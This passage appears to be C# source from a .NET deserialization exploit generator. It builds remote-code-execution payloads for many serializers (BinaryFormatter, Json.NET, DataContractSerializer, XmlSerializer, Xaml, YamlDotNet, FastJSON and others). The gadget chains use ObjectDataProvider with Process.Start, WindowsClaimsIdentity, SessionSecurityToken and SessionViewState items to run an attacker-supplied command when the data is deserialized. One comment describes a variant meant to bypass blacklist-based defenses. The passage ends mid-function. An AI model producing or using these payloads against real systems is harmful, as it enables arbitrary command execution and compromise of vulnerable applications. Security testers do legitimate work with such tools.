(formatter.ToLower().Equals("netdatacontractserializer")) { string payload = ""; if (variant_number == 2) { payload = $@"<root> <w xmlns:i=""http://www.w3.org/2001/XMLSchema-instance"" z:Type=""Microsoft.IdentityModel.Claims.WindowsClaimsIdentity"" z:Assembly=""Microsoft.IdentityModel,Version=3.5.0.0,PublicKeyToken=31bf3856ad364e35"" xmlns:z=""http://schemas.microsoft.com/2003/10/Serialization/"" xmlns=""""> <System.Security.ClaimsIdentity.actor z:Type=""System.String"" z:Assembly=""0"">{b64encoded}</System.Security.ClaimsIdentity.actor> </w> </root> "; } else if (variant_number == 3) { payload = $@"<root> <w xmlns:i=""http://www.w3.org/2001/XMLSchema-instance"" z:Type=""Microsoft.IdentityModel.Claims.WindowsClaimsIdentity"" z:Assembly=""Microsoft.IdentityModel,Version=3.5.0.0,PublicKeyToken=31bf3856ad364e35"" xmlns:z=""http://schemas.microsoft.com/2003/10/Serialization/"" xmlns=""""> <System.Security.ClaimsIdentity.bootstrapContext z:Type=""System.String"" z:Assembly=""0"">{b64encoded}</System.Security.ClaimsIdentity.bootstrapContext> </w> </root> "; } else { payload = $@"<root> <w xmlns:i=""http://www.w3.org/2001/XMLSchema-instance"" z:Type=""Microsoft.IdentityModel.Claims.WindowsClaimsIdentity"" z:Assembly=""Microsoft.IdentityModel,Version=3.5.0.0,PublicKeyToken=31bf3856ad364e35"" xmlns:z=""http://schemas.microsoft.com/2003/10/Serialization/"" xmlns=""""> <_actor z:Type=""System.String"" z:Assembly=""0"" >{b64encoded}</_actor> <m_userToken z:Type=""System.IntPtr"" z:Assembly=""0"" xmlns=""""> <value z:Type=""System.Int64"" z:Assembly=""0"">0</value> </m_userToken> <_label i:nil=""true""/> <_nameClaimType i:nil=""true""/> <_roleClaimType i:nil=""true""/> </w> </root> "; } if (inputArgs.Minify) { if (inputArgs.UseSimpleType) { payload = XMLMinifier.Minify(payload, new string[] { "Microsoft.IdentityModel" }, null); } else { payload = XMLMinifier.Minify(payload, null, null); } } if (inputArgs.Test) { try { SerializersHelper.NetDataContractSerializer_deserialize(payload, "root"); } catch (Exception err) { Debugging.ShowErrors(inputArgs, err); } } return(payload); } else if (formatter.ToLower().Equals("soapformatter")) { string payload = ""; if (variant_number == 2) { payload = $@"<SOAP-ENV:Envelope xmlns:xsi=""http://www.w3.org/2001/XMLSchema-instance"" xmlns:xsd=""http://www.w3.org/2001/XMLSchema"" xmlns:SOAP-ENC=""http://schemas.xmlsoap.org/soap/encoding/"" xmlns:SOAP-ENV=""http://schemas.xmlsoap.org/soap/envelope/"" xmlns:clr=""http://schemas.microsoft.com/soap/encoding/clr/1.0"" SOAP-ENV:encodingStyle=""http://schemas.xmlsoap.org/soap/encoding/""> <SOAP-ENV:Body> <a1:WindowsClaimsIdentity id=""ref-1"" xmlns:a1=""http://schemas.microsoft.com/clr/nsassem/Microsoft.IdentityModel.Claims/Microsoft.IdentityModel, Version=3.5.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35""> <System.Security.ClaimsIdentity.bootstrapContext xsi:type=""xsd:string"" xmlns="""">{b64encoded}</System.Security.ClaimsIdentity.bootstrapContext> </a1:WindowsClaimsIdentity> </SOAP-ENV:Body> </SOAP-ENV:Envelope> "; } else { payload = $@"<SOAP-ENV:Envelope xmlns:xsi=""http://www.w3.org/2001/XMLSchema-instance"" xmlns:xsd=""http://www.w3.org/2001/XMLSchema"" xmlns:SOAP-ENC=""http://schemas.xmlsoap.org/soap/encoding/"" xmlns:SOAP-ENV=""http://schemas.xmlsoap.org/soap/envelope/"" xmlns:clr=""http://schemas.microsoft.com/soap/encoding/clr/1.0"" SOAP-ENV:encodingStyle=""http://schemas.xmlsoap.org/soap/encoding/""> <SOAP-ENV:Body> <a1:WindowsClaimsIdentity id=""ref-1"" xmlns:a1=""http://schemas.microsoft.com/clr/nsassem/Microsoft.IdentityModel.Claims/Microsoft.IdentityModel, Version=3.5.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35""> <System.Security.ClaimsIdentity.actor xsi:type=""xsd:string"" xmlns="""">{b64encoded}</System.Security.ClaimsIdentity.actor> </a1:WindowsClaimsIdentity> </SOAP-ENV:Body> </SOAP-ENV:Envelope> "; } if (inputArgs.Minify) { if (inputArgs.UseSimpleType) { payload = XMLMinifier.Minify(payload, new string[] { "Microsoft.IdentityModel" }, null, FormatterType.SoapFormatter); } else { payload = XMLMinifier.Minify(payload, null, null, FormatterType.SoapFormatter); } } if (inputArgs.Test) { try { SerializersHelper.SoapFormatter_deserialize(payload); } catch (Exception err) { Debugging.ShowErrors(inputArgs, err); } } return(payload); } else { throw new Exception("Formatter not supported"); } }
public override object Generate(string formatter, InputArgs inputArgs) { // commented for future reference (research purposes) /* * Boolean hasArgs; * string[] splittedCMD = Helpers.CommandArgSplitter.SplitCommand(cmd, Helpers.CommandArgSplitter.CommandType.XML, out hasArgs); * * String cmdPart; * * * if (hasArgs) * { * cmdPart = $@"<System:String>"+ splittedCMD[0] + @"</System:String> * <System:String>""" + splittedCMD[1] + @""" </System:String>"; * } * else * { * cmdPart = $@"<System:String>" + splittedCMD[0] + @"</System:String>"; * } * * * string xaml_payload = @"<ResourceDictionary * xmlns=""http://schemas.microsoft.com/winfx/2006/xaml/presentation"" * xmlns:x=""http://schemas.microsoft.com/winfx/2006/xaml"" * xmlns:System=""clr-namespace:System;assembly=mscorlib"" * xmlns:Diag=""clr-namespace:System.Diagnostics;assembly=system""> * <ObjectDataProvider x:Key="""" ObjectType = ""{ x:Type Diag:Process}"" MethodName = ""Start"" > * <ObjectDataProvider.MethodParameters> * "+ cmdPart + @" * </ObjectDataProvider.MethodParameters> * </ObjectDataProvider> * </ResourceDictionary>"; * * * // This is a little bit shorter to use startinfo * if (hasArgs) * { * cmdPart = $@"<ProcessStartInfo FileName=""" + splittedCMD[0] + @""" Arguments=""" + splittedCMD[1] + @"""/>"; * } * else * { * cmdPart = $@"<ProcessStartInfo FileName=""" + splittedCMD[0] + @"""/>"; * } * * string xaml_payload = @"<ResourceDictionary * xmlns=""http://schemas.microsoft.com/winfx/2006/xaml/presentation"" * xmlns:x=""http://schemas.microsoft.com/winfx/2006/xaml"" * > * <ObjectDataProvider x:Key="""" MethodName=""Start""> * <ObjectDataProvider.ObjectInstance> * <Process xmlns=""clr-namespace:System.Diagnostics;assembly=system""> * <Process.StartInfo>" + cmdPart + @"</Process.StartInfo> * </Process> * </ObjectDataProvider.ObjectInstance> * </ObjectDataProvider> * </ResourceDictionary>"; */ if (xaml_url != "") { // this is when it comes from GenerateWithInit inputArgs.ExtraInternalArguments = new List <String> { "--variant", "3", "--xamlurl", xaml_url }; } //SerializersHelper.ShowAll(TextFormattingRunPropertiesGadget(inputArgs)); if (formatter.Equals("binaryformatter", StringComparison.OrdinalIgnoreCase) || formatter.Equals("losformatter", StringComparison.OrdinalIgnoreCase) || formatter.Equals("SoapFormatter", StringComparison.OrdinalIgnoreCase)) { return(Serialize(TextFormattingRunPropertiesGadget(inputArgs), formatter, inputArgs)); } else if (formatter.Equals("NetDataContractSerializer", StringComparison.OrdinalIgnoreCase)) { string utfString = System.Text.Encoding.UTF8.GetString((byte [])SerializeWithNoTest(TextFormattingRunPropertiesGadget(inputArgs), formatter, inputArgs)); string payload = SerializersHelper.NetDataContractSerializer_Marshal_2_MainType(utfString); if (inputArgs.Minify) { if (inputArgs.UseSimpleType) { payload = XMLMinifier.Minify(payload, new string[] { "mscorlib", "Microsoft.PowerShell.Editor" }, null, FormatterType.NetDataContractXML, true); } else { payload = XMLMinifier.Minify(payload, null, null, FormatterType.NetDataContractXML, true); } } if (inputArgs.Test) { try { SerializersHelper.NetDataContractSerializer_deserialize(payload); } catch (Exception err) { Debugging.ShowErrors(inputArgs, err); } } return(payload); } else if (formatter.ToLower().Equals("DataContractSerializer", StringComparison.OrdinalIgnoreCase)) { inputArgs.CmdType = CommandArgSplitter.CommandType.XML; string payload = ""; if (hasRootDCS) { payload = SerializersHelper.DataContractSerializer_Marshal_2_MainType(SerializersHelper.DataContractSerializer_serialize(TextFormattingRunPropertiesGenerator.TextFormattingRunPropertiesGadget(inputArgs)), "root", "type", typeof(TextFormattingRunProperties)); } else { payload = SerializersHelper.DataContractSerializer_Marshal_2_MainType(SerializersHelper.DataContractSerializer_serialize(TextFormattingRunPropertiesGenerator.TextFormattingRunPropertiesGadget(inputArgs))); } if (inputArgs.Minify) { payload = XMLMinifier.Minify(payload, null, null, FormatterType.DataContractXML, true); } if (inputArgs.Test) { try { if (hasRootDCS) { SerializersHelper.DataContractSerializer_deserialize(payload, "", "root", "type"); } else { SerializersHelper.DataContractSerializer_deserialize(payload, typeof(TextFormattingRunProperties)); } } catch (Exception err) { Debugging.ShowErrors(inputArgs, err); } } return(payload); } else { throw new Exception("Formatter not supported"); } }
public override object Generate(string formatter, InputArgs inputArgs) { Generator generator = new TextFormattingRunPropertiesGenerator(); string losFormatterText = Encoding.UTF8.GetString((byte[])generator.GenerateWithNoTest("LosFormatter", inputArgs)); if (formatter.Equals("binaryformatter", StringComparison.OrdinalIgnoreCase) || formatter.Equals("losformatter", StringComparison.OrdinalIgnoreCase) || formatter.Equals("objectstateformatter", StringComparison.OrdinalIgnoreCase)) { var obj = new SessionViewStateHistoryItemMarshal(losFormatterText); return(Serialize(obj, formatter, inputArgs)); } else if (formatter.ToLower().Equals("json.net")) { string payload = "{'$type': 'System.Web.UI.MobileControls.SessionViewState+SessionViewStateHistoryItem, System.Web.Mobile, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a', 's':'" + GetB64SessionToken(losFormatterText) + "'}"; if (inputArgs.Minify) { // by default JsonSerializerSettings.TypeNameAssemblyFormat is set to Simple so we can remove the version etc from the assembly name // see https://www.newtonsoft.com/json/help/html/P_Newtonsoft_Json_JsonSerializerSettings_TypeNameAssemblyFormat.htm // if TypeNameAssemblyFormat == Full , then we have to keep the full name payload = JSONMinifier.Minify(payload, new string[] { "System.Web.Mobile" }, null); } if (inputArgs.Test) { try { SerializersHelper.JsonNet_deserialize(payload); } catch (Exception err) { Debugging.ShowErrors(inputArgs, err); } } return(payload); } else if (formatter.ToLower().Equals("datacontractserializer")) { string payload = $@"<root type=""System.Web.UI.MobileControls.SessionViewState+SessionViewStateHistoryItem, System.Web.Mobile, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a""><SessionViewState.SessionViewStateHistoryItem xmlns:i=""http://www.w3.org/2001/XMLSchema-instance"" xmlns:x=""http://www.w3.org/2001/XMLSchema"" xmlns:z=""http://schemas.microsoft.com/2003/10/Serialization/"" xmlns=""http://schemas.datacontract.org/2004/07/System.Web.UI.MobileControls""> <s i:type=""x:string"" xmlns="""">{GetB64SessionToken(losFormatterText)}</s> </SessionViewState.SessionViewStateHistoryItem></root>"; if (inputArgs.Minify) { payload = XMLMinifier.Minify(payload, null, null); } if (inputArgs.Test) { try { SerializersHelper.DataContractSerializer_deserialize(payload, null, "root", "type"); } catch (Exception err) { Debugging.ShowErrors(inputArgs, err); } } return(payload); } else if (formatter.ToLower().Equals("netdatacontractserializer")) { string payload = $@"<root><w xmlns:i=""http://www.w3.org/2001/XMLSchema-instance"" xmlns:x=""http://www.w3.org/2001/XMLSchema"" z:Id=""1"" z:Type=""System.Web.UI.MobileControls.SessionViewState+SessionViewStateHistoryItem"" z:Assembly=""System.Web.Mobile, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a"" xmlns:z=""http://schemas.microsoft.com/2003/10/Serialization/"" xmlns=""""> <s z:Type=""System.String"" z:Assembly=""0"" xmlns="""">{GetB64SessionToken(losFormatterText)}</s> </w></root>"; if (inputArgs.Minify) { payload = XMLMinifier.Minify(payload, null, null); } if (inputArgs.Test) { try { SerializersHelper.NetDataContractSerializer_deserialize(payload, "root"); } catch (Exception err) { Debugging.ShowErrors(inputArgs, err); } } return(payload); } else if (formatter.ToLower().Equals("soapformatter")) { string payload = $@"<SOAP-ENV:Envelope xmlns:xsi=""http://www.w3.org/2001/XMLSchema-instance"" xmlns:xsd=""http://www.w3.org/2001/XMLSchema"" xmlns:SOAP-ENC=""http://schemas.xmlsoap.org/soap/encoding/"" xmlns:SOAP-ENV=""http://schemas.xmlsoap.org/soap/envelope/"" xmlns:clr=""http://schemas.microsoft.com/soap/encoding/clr/1.0"" SOAP-ENV:encodingStyle=""http://schemas.xmlsoap.org/soap/encoding/""> <SOAP-ENV:Body> <a1:SessionViewState_x002B_SessionViewStateHistoryItem id=""ref-1"" xmlns:a1=""http://schemas.microsoft.com/clr/nsassem/System.Web.UI.MobileControls/System.Web.Mobile%2C%20Version%3D4.0.0.0%2C%20Culture%3Dneutral%2C%20PublicKeyToken%3Db03f5f7f11d50a3a""> <s>{GetB64SessionToken(losFormatterText)}</s> </a1:SessionViewState_x002B_SessionViewStateHistoryItem> </SOAP-ENV:Body> </SOAP-ENV:Envelope> "; if (inputArgs.Minify) { payload = XMLMinifier.Minify(payload, null, null, FormatterType.SoapFormatter); } if (inputArgs.Test) { try { SerializersHelper.SoapFormatter_deserialize(payload); } catch (Exception err) { Debugging.ShowErrors(inputArgs, err); } } return(payload); } else { throw new Exception("Formatter not supported"); } }
public override object Generate(string formatter, InputArgs inputArgs) { Generator generator = new TextFormattingRunPropertiesGenerator(); byte[] binaryFormatterPayload = (byte[])generator.GenerateWithNoTest("BinaryFormatter", inputArgs); string b64encoded = Convert.ToBase64String(binaryFormatterPayload); if (formatter.Equals("binaryformatter", StringComparison.OrdinalIgnoreCase) || formatter.Equals("losformatter", StringComparison.OrdinalIgnoreCase) || formatter.Equals("objectstateformatter", StringComparison.OrdinalIgnoreCase)) { var obj = new SessionSecurityTokenMarshal(b64encoded); return(Serialize(obj, formatter, inputArgs)); } else if (formatter.ToLower().Equals("json.net")) { string payload = "{'$type': 'System.IdentityModel.Tokens.SessionSecurityToken, System.IdentityModel, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089', 'SessionToken':{'$type':'System.Byte[], mscorlib','$value':'" + GetB64SessionToken(b64encoded) + "'}}"; if (inputArgs.Minify) { payload = JSONMinifier.Minify(payload, new string[] { "System.IdentityModel" }, null); } if (inputArgs.Test) { try { SerializersHelper.JsonNet_deserialize(payload); } catch (Exception err) { Debugging.ShowErrors(inputArgs, err); } } return(payload); } else if (formatter.ToLower().Equals("datacontractserializer")) { string payload = $@"<root type=""System.IdentityModel.Tokens.SessionSecurityToken, System.IdentityModel, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089""><SessionSecurityToken xmlns:i=""http://www.w3.org/2001/XMLSchema-instance"" xmlns:x=""http://www.w3.org/2001/XMLSchema"" xmlns:z=""http://schemas.microsoft.com/2003/10/Serialization/"" xmlns=""http://schemas.datacontract.org/2004/07/System.IdentityModel.Tokens""> <SessionToken i:type=""x:base64Binary"" xmlns="""">{GetB64SessionToken(b64encoded)}</SessionToken> </SessionSecurityToken></root>"; if (inputArgs.Minify) { payload = XMLMinifier.Minify(payload, null, null); } if (inputArgs.Test) { try { SerializersHelper.DataContractSerializer_deserialize(payload, null, "root", "type"); } catch (Exception err) { Debugging.ShowErrors(inputArgs, err); } } return(payload); } else if (formatter.ToLower().Equals("netdatacontractserializer")) { string payload = $@"<root><w xmlns:i=""http://www.w3.org/2001/XMLSchema-instance"" xmlns:x=""http://www.w3.org/2001/XMLSchema"" z:Id=""1"" z:Type=""System.IdentityModel.Tokens.SessionSecurityToken"" z:Assembly=""System.IdentityModel, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089"" xmlns:z=""http://schemas.microsoft.com/2003/10/Serialization/"" xmlns=""""> <SessionToken z:Type=""System.Byte[]"" z:Assembly=""0"" xmlns="""">{GetB64SessionToken(b64encoded)}</SessionToken> </w></root>"; if (inputArgs.Minify) { payload = XMLMinifier.Minify(payload, null, null); } if (inputArgs.Test) { try { SerializersHelper.NetDataContractSerializer_deserialize(payload, "root"); } catch (Exception err) { Debugging.ShowErrors(inputArgs, err); } } return(payload); } else if (formatter.ToLower().Equals("soapformatter")) { string payload = $@"<SOAP-ENV:Envelope xmlns:xsi=""http://www.w3.org/2001/XMLSchema-instance"" xmlns:xsd=""http://www.w3.org/2001/XMLSchema"" xmlns:SOAP-ENC=""http://schemas.xmlsoap.org/soap/encoding/"" xmlns:SOAP-ENV=""http://schemas.xmlsoap.org/soap/envelope/"" xmlns:clr=""http://schemas.microsoft.com/soap/encoding/clr/1.0"" SOAP-ENV:encodingStyle=""http://schemas.xmlsoap.org/soap/encoding/""> <SOAP-ENV:Body> <a1:SessionSecurityToken id=""ref-1"" xmlns:a1=""http://schemas.microsoft.com/clr/nsassem/System.IdentityModel.Tokens/System.IdentityModel%2C%20Version%3D4.0.0.0%2C%20Culture%3Dneutral%2C%20PublicKeyToken%3Db77a5c561934e089""> <SessionToken href=""#ref-3""/> </a1:SessionSecurityToken> <SOAP-ENC:Array id=""ref-3"" xsi:type=""SOAP-ENC:base64"">{GetB64SessionToken(b64encoded)}</SOAP-ENC:Array> </SOAP-ENV:Body> </SOAP-ENV:Envelope> "; if (inputArgs.Minify) { payload = XMLMinifier.Minify(payload, null, null, FormatterType.SoapFormatter); } if (inputArgs.Test) { try { SerializersHelper.SoapFormatter_deserialize(payload); } catch (Exception err) { Debugging.ShowErrors(inputArgs, err); } } return(payload); } else { throw new Exception("Formatter not supported"); } }
public override object Generate(string formatter, InputArgs inputArgs) { // NOTE: What is Xaml2? Xaml2 uses ResourceDictionary in addition to just using ObjectDataProvider as in Xaml if (formatter.ToLower().Equals("xaml") || formatter.ToLower().Equals("xaml2")) { ProcessStartInfo psi = new ProcessStartInfo(); psi.FileName = inputArgs.CmdFileName; if (inputArgs.HasArguments) { psi.Arguments = inputArgs.CmdArguments; } StringDictionary dict = new StringDictionary(); psi.GetType().GetField("environmentVariables", BindingFlags.Instance | BindingFlags.NonPublic).SetValue(psi, dict); Process p = new Process(); p.StartInfo = psi; ObjectDataProvider odp = new ObjectDataProvider(); odp.MethodName = "Start"; odp.IsInitialLoadEnabled = false; odp.ObjectInstance = p; string payload = ""; if (formatter.ToLower().Equals("xaml2")) { ResourceDictionary myResourceDictionary = new ResourceDictionary(); myResourceDictionary.Add("", odp); payload = XamlWriter.Save(myResourceDictionary); } else { payload = XamlWriter.Save(odp); } if (inputArgs.Minify) { // using discardable regex array to make it shorter! payload = XMLMinifier.Minify(payload, null, new String[] { @"StandardErrorEncoding=.*LoadUserProfile=""False"" ", @"IsInitialLoadEnabled=""False"" " }); } if (inputArgs.Test) { try { SerializersHelper.Xaml_deserialize(payload); } catch { } } return(payload); } if (formatter.ToLower().Equals("json.net")) { inputArgs.CmdType = CommandArgSplitter.CommandType.JSON; string cmdPart = ""; if (inputArgs.HasArguments) { cmdPart = "'" + inputArgs.CmdFileName + "', '" + inputArgs.CmdArguments + "'"; } else { cmdPart = "'" + inputArgs.CmdFileName + "'"; } String payload = @"{ '$type':'System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35', 'MethodName':'Start', 'MethodParameters':{ '$type':'System.Collections.ArrayList, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089', '$values':[" + cmdPart + @"] }, 'ObjectInstance':{'$type':'System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089'} }"; if (inputArgs.Minify) { if (inputArgs.UseSimpleType) { payload = JSONMinifier.Minify(payload, new String[] { "PresentationFramework", "mscorlib", "System" }, null); } else { payload = JSONMinifier.Minify(payload, null, null); } } if (inputArgs.Test) { try { SerializersHelper.JsonNet_deserialize(payload); } catch { } } return(payload); } else if (formatter.ToLower().Equals("fastjson")) { inputArgs.CmdType = CommandArgSplitter.CommandType.JSON; String cmdPart; if (inputArgs.HasArguments) { cmdPart = @"""FileName"":""" + inputArgs.CmdFileName + @""",""Arguments"":""" + inputArgs.CmdArguments + @""""; } else { cmdPart = @"""FileName"":""" + inputArgs.CmdFileName + @""""; } String payload = @"{ ""$types"":{ ""System.Windows.Data.ObjectDataProvider, PresentationFramework, Version = 4.0.0.0, Culture = neutral, PublicKeyToken = 31bf3856ad364e35"":""1"", ""System.Diagnostics.Process, System, Version = 4.0.0.0, Culture = neutral, PublicKeyToken = b77a5c561934e089"":""2"", ""System.Diagnostics.ProcessStartInfo, System, Version = 4.0.0.0, Culture = neutral, PublicKeyToken = b77a5c561934e089"":""3"" }, ""$type"":""1"", ""ObjectInstance"":{ ""$type"":""2"", ""StartInfo"":{ ""$type"":""3"", " + cmdPart + @" } }, ""MethodName"":""Start"" }"; if (inputArgs.Minify) { payload = JSONMinifier.Minify(payload, null, null); } if (inputArgs.Test) { try { var instance = JSON.ToObject <Object>(payload); } catch { } } return(payload); } else if (formatter.ToLower().Equals("javascriptserializer")) { inputArgs.CmdType = CommandArgSplitter.CommandType.JSON; String cmdPart; if (inputArgs.HasArguments) { cmdPart = "'FileName':'" + inputArgs.CmdFileName + "', 'Arguments':'" + inputArgs.CmdArguments + "'"; } else { cmdPart = "'FileName':'" + inputArgs.CmdFileName + "'"; } String payload = @"{ '__type':'System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35', 'MethodName':'Start', 'ObjectInstance':{ '__type':'System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089', 'StartInfo': { '__type':'System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089', " + cmdPart + @" } } }"; if (inputArgs.Minify) { payload = JSONMinifier.Minify(payload, null, null); } if (inputArgs.Test) { try { SerializersHelper.JavaScriptSerializer_deserialize(payload); } catch { } } return(payload); } else if (formatter.ToLower().Equals("xmlserializer")) { inputArgs.CmdType = CommandArgSplitter.CommandType.XML; String cmdPart; if (inputArgs.HasArguments) { cmdPart = $@"<ObjectDataProvider.MethodParameters><b:String>{inputArgs.CmdFileName}</b:String><b:String>{inputArgs.CmdArguments}</b:String>"; } else { cmdPart = $@"<ObjectDataProvider.MethodParameters><b:String>{inputArgs.CmdFileName}</b:String>"; } String payload = $@"<?xml version=""1.0""?> <root type=""System.Data.Services.Internal.ExpandedWrapper`2[[System.Windows.Markup.XamlReader, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35],[System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35]], System.Data.Services, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089""> <ExpandedWrapperOfXamlReaderObjectDataProvider xmlns:xsi=""http://www.w3.org/2001/XMLSchema-instance"" xmlns:xsd=""http://www.w3.org/2001/XMLSchema"" > <ExpandedElement/> <ProjectedProperty0> <MethodName>Parse</MethodName> <MethodParameters> <anyType xmlns:xsi=""http://www.w3.org/2001/XMLSchema-instance"" xmlns:xsd=""http://www.w3.org/2001/XMLSchema"" xsi:type=""xsd:string""> <![CDATA[<ResourceDictionary xmlns=""http://schemas.microsoft.com/winfx/2006/xaml/presentation"" xmlns:d=""http://schemas.microsoft.com/winfx/2006/xaml"" xmlns:b=""clr-namespace:System;assembly=mscorlib"" xmlns:c=""clr-namespace:System.Diagnostics;assembly=system""><ObjectDataProvider d:Key="""" ObjectType=""{{d:Type c:Process}}"" MethodName=""Start"">{cmdPart}</ObjectDataProvider.MethodParameters></ObjectDataProvider></ResourceDictionary>]]> </anyType> </MethodParameters> <ObjectInstance xsi:type=""XamlReader""></ObjectInstance> </ProjectedProperty0> </ExpandedWrapperOfXamlReaderObjectDataProvider> </root> "; if (inputArgs.Minify) { payload = XMLMinifier.Minify(payload, null, null, FormatterType.XMLSerializer, true); } if (inputArgs.Test) { try { SerializersHelper.XMLSerializer_deserialize(payload, null, "root"); } catch { } } return(payload); } else if (formatter.ToLower().Equals("datacontractserializer2")) { // This by mixing what we had already in xmlserializer and datacontractserializer // this can be useful to bypass deserializers that are based on a blacklist inputArgs.CmdType = CommandArgSplitter.CommandType.XML; String cmdPart; if (inputArgs.HasArguments) { cmdPart = $@"<ObjectDataProvider.MethodParameters><b:String>{inputArgs.CmdFileName}</b:String><b:String>{inputArgs.CmdArguments}</b:String>"; } else { cmdPart = $@"<ObjectDataProvider.MethodParameters><b:String>{inputArgs.CmdFileName}</b:String>"; } String payload = $@"<?xml version=""1.0""?> <root type=""System.Data.Services.Internal.ExpandedWrapper`2[[System.Windows.Markup.XamlReader, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35],[System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35]], System.Data.Services, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089""> <ExpandedWrapperOfXamlReaderObjectDataProviderRexb2zZW xmlns:xsi=""http://www.w3.org/2001/XMLSchema-instance"" xmlns:xsd=""http://www.w3.org/2001/XMLSchema"" xmlns=""http://schemas.datacontract.org/2004/07/System.Data.Services.Internal"" xmlns:z=""http://schemas.microsoft.com/2003/10/Serialization/""> <ExpandedElement z:Id=""ref1"" > <__identity xsi:nil=""true"" xmlns=""http://schemas.datacontract.org/2004/07/System""/> </ExpandedElement> <ProjectedProperty0 xmlns:a=""http://schemas.datacontract.org/2004/07/System.Windows.Data""> <a:MethodName>Parse</a:MethodName> <a:MethodParameters> <anyType xsi:type=""xsd:string"" xmlns=""http://schemas.microsoft.com/2003/10/Serialization/Arrays""> <![CDATA[<ResourceDictionary xmlns=""http://schemas.microsoft.com/winfx/2006/xaml/presentation"" xmlns:d=""http://schemas.microsoft.com/winfx/2006/xaml"" xmlns:b=""clr-namespace:System;assembly=mscorlib"" xmlns:c=""clr-namespace:System.Diagnostics;assembly=system""><ObjectDataProvider d:Key="""" ObjectType=""{{d:Type c:Process}}"" MethodName=""Start"">{cmdPart}</ObjectDataProvider.MethodParameters></ObjectDataProvider></ResourceDictionary>]]> </anyType> </a:MethodParameters> <a:ObjectInstance z:Ref=""ref1""/> </ProjectedProperty0> </ExpandedWrapperOfXamlReaderObjectDataProviderRexb2zZW> </root> "; if (inputArgs.Minify) { payload = XMLMinifier.Minify(payload, null, null, FormatterType.DataContractXML, true); } if (inputArgs.Test) { try { SerializersHelper.DataContractSerializer_deserialize(payload, null, "root"); } catch { } } return(payload); } else if (formatter.ToLower().Equals("datacontractserializer")) { inputArgs.CmdType = CommandArgSplitter.CommandType.XML; String cmdPart; if (inputArgs.HasArguments) { cmdPart = $@"<b:anyType i:type=""c:string"">" + inputArgs.CmdFileName + @"</b:anyType> <b:anyType i:type=""c:string"">" + inputArgs.CmdArguments + "</b:anyType>"; } else { cmdPart = $@"<anyType i:type=""c:string"" xmlns=""http://schemas.microsoft.com/2003/10/Serialization/Arrays"">" + inputArgs.CmdFileName + @"</anyType>"; } String payload = $@"<?xml version=""1.0""?> <root type=""System.Data.Services.Internal.ExpandedWrapper`2[[System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35]],System.Data.Services, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089""> <ExpandedWrapperOfProcessObjectDataProviderpaO_SOqJL xmlns=""http://schemas.datacontract.org/2004/07/System.Data.Services.Internal"" xmlns:c=""http://www.w3.org/2001/XMLSchema"" xmlns:i=""http://www.w3.org/2001/XMLSchema-instance"" xmlns:z=""http://schemas.microsoft.com/2003/10/Serialization/"" > <ExpandedElement z:Id=""ref1"" > <__identity i:nil=""true"" xmlns=""http://schemas.datacontract.org/2004/07/System""/> </ExpandedElement> <ProjectedProperty0 xmlns:a=""http://schemas.datacontract.org/2004/07/System.Windows.Data""> <a:MethodName>Start</a:MethodName> <a:MethodParameters xmlns:b=""http://schemas.microsoft.com/2003/10/Serialization/Arrays""> " + cmdPart + @" </a:MethodParameters> <a:ObjectInstance z:Ref=""ref1""/> </ProjectedProperty0> </ExpandedWrapperOfProcessObjectDataProviderpaO_SOqJL> </root> "; if (inputArgs.Minify) { payload = XMLMinifier.Minify(payload, null, null, FormatterType.DataContractXML, true); } if (inputArgs.Test) { try { SerializersHelper.DataContractSerializer_deserialize(payload, null, "root"); } catch { } } return(payload); } else if (formatter.ToLower().Equals("yamldotnet")) { inputArgs.CmdType = CommandArgSplitter.CommandType.YamlDotNet; String cmdPart; if (inputArgs.HasArguments) { cmdPart = $@"FileName: " + inputArgs.CmdFileName + @", Arguments: " + inputArgs.CmdArguments; } else { cmdPart = $@"FileName: " + inputArgs.CmdFileName; } String payload = @" !<!System.Windows.Data.ObjectDataProvider,PresentationFramework,Version=4.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35> { MethodName: Start, ObjectInstance: !<!System.Diagnostics.Process,System,Version=4.0.0.0,Culture=neutral,PublicKeyToken=b77a5c561934e089> { StartInfo: !<!System.Diagnostics.ProcessStartInfo,System,Version=4.0.0.0,Culture=neutral,PublicKeyToken=b77a5c561934e089> { " + cmdPart + @" } } }"; if (inputArgs.Minify) { payload = YamlDocumentMinifier.Minify(payload); } if (inputArgs.Test) { try { SerializersHelper.YamlDotNet_deserialize(payload); } catch { } } return(payload); } else if (formatter.ToLower().Equals("fspickler")) { inputArgs.CmdType = CommandArgSplitter.CommandType.XML; String cmdPart; if (inputArgs.HasArguments) { cmdPart = 